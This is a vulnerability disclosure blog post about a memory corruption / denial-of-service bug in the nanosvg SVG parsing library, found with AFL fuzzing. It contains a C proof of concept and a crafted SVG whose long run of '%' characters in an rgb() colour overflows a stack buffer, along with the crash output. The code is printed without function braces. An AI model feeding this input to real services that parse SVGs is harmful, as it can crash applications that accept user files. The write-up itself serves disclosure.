CVE-2019-1000032: Memory corruption / DoS in nanosvg

This is finally the first 0day-like blogpost about a memory corruption/DoS issue that I have discovered in nanosvg by fuzzing it with AFL.

UPDATE: After my request for updating the CVE-ID, it was magically assigned CVE-2019-1010258.

Last year, I started to play around with American Fuzzy Lop and began to fuzz some open source projects from GitHub. One of those projects was nanosvg, a small library for working with SVG files.

After writing a small fuzz target program, I let AFL fuzz for a couple of days.

Eventually, AFL managed to find an input that crashes the binary within the nanosvg library.

As I didn't have the time and knowledge to have a deep look into the crash files and analyze them, my colleague bitwave (Moritz Lummerzheim) helped me out. He created a minimal working example to trigger the bug and figured out that one can overflow a buffer using % or \t characters in the nsvg__parseColorRGB color function.

Here is a PoC that will trigger a segfault in the vulnerable function:

#include <stdio.h>
#include <string.h>
#include <float.h>
#include "./src/nanosvg.h"

int main(int argc, char const *argv[])
	printf("%d\n", nsvg__parseColorRGB("rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"));
	return 0;

The function can also be triggered by using the library in its intended way, e.g. by passing a SVG file to nsvgParseFromFile:

int main(int argc, char const *argv[])
	struct NSVGimage* image;
	image = nsvgParseFromFile(argv[1], "px", 96);

The following svg is a minimal PoC that will result in a segfault:

	<circle fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
$> ./test poc.svg
*** stack smashing detected ***: <unknown> terminated
fish: “./test poc.svg” terminated by signal SIGABRT (Abort)

We were unable find a way to develop a more serious exploit, we reported the problem to the develop through issue #136, but it seems like the dev is inactive and/or has not cared to respond.

Anyway, the best we can achieve using the bug is crashing the application with a segfault. A quick search shows that several programming languages have created packages with bindings to the nanosvg library:

So depending on the usage of those libraries, passing user-controlled SVG files to nanosvg might allow an attacker to trigger this bug.

If you manage to develop a more serious exploit or exploitation scenario, please let us know and I'll update this blogpost.
